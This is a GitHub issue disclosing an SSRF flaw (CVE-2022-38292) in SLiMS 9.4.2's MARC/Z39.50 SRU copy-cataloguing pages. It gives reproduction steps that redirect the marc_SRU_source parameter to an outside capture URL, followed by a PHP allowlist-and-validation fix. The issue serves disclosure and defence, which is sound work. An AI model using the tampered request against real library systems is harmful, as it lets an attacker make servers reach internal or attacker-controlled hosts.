CVE-2022-38292: [Security Bugs] Server Side Request Forgery · Issue #158 · slims/slims9_bulian

SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.


The bug
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php, due to the class in lib/marc/XMLParser.inc.php.

Reproduce
Steps to reproduce the behavior:

  1. Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography, then go to Copy Cataloguing.
  2. Choose between MARC SRU or z3950 SRU.
  3. Type anything you want in the search bar.
  4. Set Burp Suite intercept on.
  5. Change the z3950_SRU_source or marc_SRU_source parameter value to some URL that captures the traffic.
  6. Forward the request.
  7. Or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN
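The report above boils down to one pattern: the value of marc_SRU_source (or z3950_SRU_source) is taken from the request and used as the URL the server fetches. The following is an added example, not SLiMS code, showing how a maintainer could close that off: the parameter becomes an id looked up in a server-side allowlist, and, as defence in depth, every URL is still validated (https only, no credentials, no literal IP, resolves only to public addresses) before it is fetched. The endpoint names, the helper names (`resolveSruSource`, `sruUrlRejectionReason`, `pickFetchUrl`), the injected fake resolver and the sample requests are all constructed for this example.

```php
<?php
// Added example, not SLiMS code: two layers that keep a request parameter such as
// marc_SRU_source from steering the server's fetch to an arbitrary URL.
//   1. Treat the parameter as an id into a server-side allowlist (preferred fix).
//   2. Validate any URL before it is fetched (defence in depth; also catches a bad config entry).
// Endpoint names, helper names, the fake resolver and sample requests are all constructed.
declare(strict_types=1);

/** Hypothetical server-side catalogue of SRU endpoints, keyed by a short id. */
const SRU_SOURCES = [
    'loc'  => 'https://sru.example.org/marc',          // constructed endpoint
    'nlib' => 'https://catalog.example.net/z3950sru',  // constructed endpoint
];

/** Layer 1: the client may only name an entry, never supply a URL. */
function resolveSruSource(string $sourceId): ?string
{
    return SRU_SOURCES[$sourceId] ?? null;
}

/**
 * Layer 2: reject anything that is not an https URL with a hostname (no literal IP,
 * no credentials) that resolves only to public addresses. $resolve maps a host to a
 * list of IPv4 strings and defaults to gethostbynamel(); the demo below injects a
 * fake resolver so the script runs without network access.
 * Returns the rejection reason, or null when the URL is acceptable.
 */
function sruUrlRejectionReason(string $url, ?callable $resolve = null): ?string
{
    $resolve = $resolve ?? 'gethostbynamel';
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return 'unparseable or relative URL';
    }
    if (strtolower($p['scheme']) !== 'https') {
        return 'scheme must be https, got ' . $p['scheme'];
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'credentials in URL are not allowed';
    }
    if (filter_var($p['host'], FILTER_VALIDATE_IP) !== false) {
        return 'literal IP hosts are not allowed';
    }
    $addresses = $resolve($p['host']);
    if (empty($addresses)) {
        return 'host does not resolve';
    }
    foreach ($addresses as $ip) {
        // NO_PRIV_RANGE rejects RFC 1918; NO_RES_RANGE rejects loopback, link-local, 0/8, 240/4.
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return "host resolves to non-public address $ip";
        }
    }
    return null;
}

/**
 * Hardened handler: $query stands in for $_GET. Returns the URL the server may
 * fetch, or null with the reason in $error.
 */
function pickFetchUrl(array $query, ?string &$error, ?callable $resolve = null): ?string
{
    $error = null;
    $id  = (string) ($query['marc_SRU_source'] ?? '');
    $url = resolveSruSource($id);
    if ($url === null) {
        $error = "unknown SRU source id '$id'";
        return null;
    }
    $reason = sruUrlRejectionReason($url, $resolve);
    if ($reason !== null) {
        $error = $reason;
        return null;
    }
    return $url;
}

// Constructed DNS answers so the demo runs offline. 203.0.113.0/24 is a
// documentation range that PHP's range filters treat as public.
$fakeDns = fn (string $host): array => [
    'sru.example.org'     => ['203.0.113.10'],
    'catalog.example.net' => ['203.0.113.20'],
    'intranet.example'    => ['10.0.0.5'],
][$host] ?? [];

// Constructed requests: the normal shape from the report and a tampered one.
$requests = [
    ['keywords' => 'aaaaaaaa', 'index' => '0', 'marc_SRU_source' => 'loc'],
    ['keywords' => 'aaaaaaaa', 'index' => '0', 'marc_SRU_source' => 'http://collector.example/hook'],
];
foreach ($requests as $q) {
    $url = pickFetchUrl($q, $err, $fakeDns);
    printf("%-32s -> %s\n", $q['marc_SRU_source'], $url ?? "rejected: $err");
}
// Layer 2 on its own, for URLs that never went through the id lookup (e.g. a mistaken config entry).
foreach (['https://203.0.113.10/marc', 'https://intranet.example/marc', 'https://sru.example.org/marc'] as $u) {
    printf("%-32s -> %s\n", $u, sruUrlRejectionReason($u, $fakeDns) ?? 'ok');
}
```

With the id lookup in place the tampered request from step 5 never reaches a fetch, because the parameter no longer carries a URL at all. The second layer exists for the URLs that do get fetched: a resolver check at validation time does not stop DNS rebinding between the check and the fetch, so in production the HTTP client should also be pinned to the checked address or the same check repeated on the address actually connected to.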

Screenshots (captions only)

  • Normal request
  • Tampered request and SSRF trigger (netcat)
  • Tampered request and SSRF trigger (toptal.com)

Versions

  • OS: macOS Mojave 10.14.6
  • Browser: Google Chrome 103.0.5060.134 (Official Build) (x86_64)
  • SLiMS version: slims9_bulian-9.4.2
